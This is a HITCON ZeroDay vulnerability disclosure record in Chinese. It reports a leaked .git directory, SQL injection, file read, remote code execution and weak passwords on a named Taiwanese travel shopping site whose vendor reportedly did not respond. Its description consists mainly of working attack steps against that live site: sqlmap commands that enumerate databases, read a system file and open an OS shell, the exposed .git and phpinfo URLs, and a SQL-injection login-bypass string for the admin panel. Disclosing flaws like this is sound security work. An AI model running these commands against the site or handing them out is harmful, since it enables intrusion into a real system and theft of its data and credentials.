旅行購物保障網 git leak、SQLi、SQLi tp Login、SQLi to LFI、SQLi to RCE、弱密碼

Vulnerability Overview

ZDID: ZD-2025-00061
發信 Vendor: 中華民國旅行業品質保障協會
Title: 旅行購物保障網 git leak、SQLi、SQLi tp Login、SQLi to LFI、SQLi to RCE、弱密碼
Introduction: git leak、SQLi、SQLi tp Login、SQLi to LFI、SQLi to RCE、弱密碼

處理狀態

目前狀態

公開

Last Update : 2025/03/26

新提交
已審核
已通報
未回報修補狀況
未複測
公開

處理歷程

2025/01/10 17:38:23 : 新提交 (由 {{萌新}} 更新此狀態)
2025/01/10 17:44:13 : 新提交 (由 {{萌新}} 更新此狀態)
2025/01/15 15:47:47 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/01/17 17:24:49 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/01/17 17:24:49 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/03/26 03:02:56 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2025-00061
通報者：nhd1261 ({{萌新}})
風險：嚴重
類型：遠端命令執行 (Remote Code Execution)

參考資料

攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。

漏洞說明： OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection

漏洞說明： OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection

漏洞說明： CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html

漏洞說明： CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

git leak：
將.git下載下來後可以還原網站原始碼。
https://shop.travel.org.tw/.git

phpinfo：
https://shop.travel.org.tw/123.php

SQLi、SQLi to LFI、SQLi to RCE
python sqlmap.py "https://shop.travel.org.tw/pd_list.php?classid=1" --thread 10 --random-agent --batch --dbs
python sqlmap.py "https://shop.travel.org.tw/pd_list.php?classid=1" --thread 10 --random-agent --batch --file-read "C:\Windows\Win.ini"
python sqlmap.py "https://shop.travel.org.tw/pd_list.php?classid=1" --thread 10 --random-agent --batch --os-shell --web-root "C:\WEB\IIS_WEB\Shop_Web"

後台：
https://shop.travel.org.tw/admin/
帳號：'Or '1'='1' -- '
密碼：'Or '1'='1' -- '
SQL裡可以直接看到明文密碼，帳密屬於能輕易暴力破解的那種